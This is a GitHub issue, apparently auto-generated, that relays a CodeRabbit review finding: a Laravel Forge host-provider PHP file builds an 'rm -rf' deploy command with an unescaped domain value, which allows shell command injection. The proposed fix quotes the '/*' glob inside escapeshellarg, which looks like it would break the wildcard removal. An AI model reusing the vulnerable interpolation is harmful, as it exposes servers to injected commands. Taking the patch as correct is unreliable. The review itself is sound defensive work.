Skip to content

quality-debt: inc/integrations/host-providers/class-laravel-forge-host-provider.php — PR #318 review feedback (medium) #411

Description

@superdav42

Unactioned Review Feedback

Source PR: #318
File: inc/integrations/host-providers/class-laravel-forge-host-provider.php
Reviewers: coderabbit
Findings: 1
Max severity: medium


MEDIUM: coderabbit (coderabbitai[bot])

File: inc/integrations/host-providers/class-laravel-forge-host-provider.php:743
⚠️ Potential issue | 🟠 Major

Validate domain input before using in shell commands to prevent command injection.

The generated deploy command uses rm -rf with the domain name directly interpolated. While WordPress likely validates domain names, an attacker-controlled domain value could potentially contain shell metacharacters, leading to command injection.

Ensure the domain is properly validated and escaped before use in shell commands:

🔒 Proposed security fix
 } elseif (defined('WU_FORGE_SYMLINK_TARGET') && WU_FORGE_SYMLINK_TARGET) {
 	// Build symlink command if target is specified.
+	// Validate domain to prevent command injection
+	if (!preg_match('/^[a-z0-9][a-z0-9\-\.]*[a-z0-9]$/i', $domain)) {
+		wu_log_add(
+			'integration-forge',
+			sprintf('Invalid domain format for shell command: %s', $domain),
+			LogLevel::ERROR
+		);
+		return '';
+	}
+	
 	$target  = str_replace('{domain}', $domain, WU_FORGE_SYMLINK_TARGET);
 	$command = sprintf(
-		'rm -rf /home/forge/%s/* && ln -s %s /home/forge/%s/public',
-		$domain,
-		$target,
-		$domain
+		'rm -rf %s && ln -s %s %s',
+		escapeshellarg('/home/forge/' . $domain . '/*'),
+		escapeshellarg($target),
+		escapeshellarg('/home/forge/' . $domain . '/public')
 	);
 }

Committable suggestion skipped: line range outside the PR's diff.

View comment


Auto-generated by quality-feedback-helper.sh scan-merged. Review each finding and either fix the code or dismiss with a reason.

Metadata

Metadata

Assignees

Labels

dispatched:sonnetTask dispatched to sonnet modelpriority:mediumMedium severity — moderate quality issuequality-debtUnactioned review feedback from merged PRssource:review-feedbackAuto-created by quality-feedback-helper.shstatus:in-reviewPR open, awaiting review/merge

Type

No type

Fields

No fields configured for issues without a type.

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions